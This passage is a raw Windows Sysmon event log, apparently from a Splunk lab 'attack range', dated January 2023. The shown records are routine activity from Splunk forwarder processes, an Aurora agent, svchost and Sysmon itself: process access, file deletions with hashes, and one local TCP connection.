Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015477Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-E395-63C7-E701-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015527Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.763{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F1DE922E8817FCB13B4544C1264FD66,SHA256=3F2F73E005771B5DD3CC54AB6CDC9940D26A79ECFCF4507F2D02F8360BB732CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015526Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.701{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=E39B0F2590E960E4EBC9084CB9FF84C6,SHA256=8D87F958DEC86C5A6E4BCB1150FCC0C19B03804A2524E3AC34A923B4BEAEA27B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015525Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.591{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015524Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.591{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015523Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.591{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015522Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015521Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015520Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 23542300x800000000000000040575Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.936{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=116530D6F7534227A41AF201619A682F,SHA256=2A795DCC8B4386042A2C60F7707A50F3E5B98719C4717A19DC73781ED5CC511A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040574Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.732{FE4C2B44-E396-63C7-0D06-00000000AF02}32126788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E396-63C7-0D06-00000000AF02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E396-63C7-0D06-00000000AF02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.560{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E396-63C7-0D06-00000000AF02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.561{FE4C2B44-E396-63C7-0D06-00000000AF02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.204{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30B0EF832DB5CD3CF340CDB0EECCC11,SHA256=0FEF625F190C7110CC4DF157EB6331046670200683803D91F79656F48CB16E52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:30.032{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=A28EDDD4F82A5D6571FA1259305AD68E,SHA256=71A795F5A9A9EEF3B4B2B0D29EF3CD9060527FB4AE549512C325BC660319EE7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.726{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56250-false10.0.1.12-8000- 10341000x800000000000000015519Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015518Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015517Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015516Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015515Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015514Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015513Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015512Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 